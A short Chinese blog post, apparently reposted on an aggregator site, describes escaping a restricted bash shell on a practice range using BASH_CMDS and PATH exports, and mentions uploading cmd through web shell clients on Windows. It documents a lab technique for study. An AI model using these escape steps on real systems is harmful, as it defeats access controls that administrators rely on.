zoukankan
html css js c++ java
小记如何绕过受限的shell
今天的靶场登陆ssh后发现shell受限,如下
woami都执行不了,查看对应的bin目录,发现只能执行4个命令
在网上学到一招可以绕过这种受限制的被阉割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash给a变量
/bin/bash
echo $0 #查看脚本本身的名字
echo $? #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/ #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin #将/usr/bin作为PATH环境变量导出
执行完上面加粗的四步之后就可以执行所有命令了
Windows中如果遇到此类情形
1.找到一处可上传文件的位置上传cmd
2.蚁剑可以自定义cmd的环境变量
使用菜刀同样上传cmd文件
设置cmd环境变量 终端输入 set cmd文件的物理地址
查看全文
相关阅读:
20162328蔡文琛 四则运算第一周
实验三:实验报告
20162328蔡文琛week09
20162328蔡文琛week08
20162328蔡文琛week07
实验报告二
20162312张家铖 10.9查找课堂测试
20162312实验一
# 20162312 2017-2018-3 《程序设计与数据结构》第3周学习总结
# 20162312 2017-2018-1 《程序设计与数据结构》第1周学习总结
原文地址:https://www.cnblogs.com/sup3rman/p/12392161.html
最新文章
20155319 课堂实践二
2017-2018-1 20155319 《信息安全系统设计基础》第6周学习总结
2017-2018-1 20155319《信息安全技术》实验二——Windows口令破解
2017-2018-1 20155319 《信息安全系统设计基础》第五周学习总结
2017-2018-1 20155319 20155334 实验一 开发环境的熟悉
2017-2018-1 20155319 《信息安全系统设计基础》第4周学习总结
Linux内核分析第三周学习博客——跟踪分析Linux内核的启动过程
Linux内核分析第二周学习博客——完成一个简单的时间片轮转多道程序内核代码
Linux内核分析第一周学习博客 --- 通过反汇编方式学习计算机工作过程
信息安全系统设计基础期末总结
热门文章
信息安全系统设计基础第五次实验报告
信息安全系统设计基础第四次实验报告
信息安全系统设计基础第十四周学习总结
信息安全系统设计基础第十三周学习总结
信息安全系统设计基础第三次实验报告
信息安全系统设计基础第二次实验报告
20162328蔡文琛 实验五
20162328蔡文琛 四则运算挑战
20162328蔡文琛 实验四
20162328蔡文琛四则运算第二周
Copyright © 2011-2022 走看看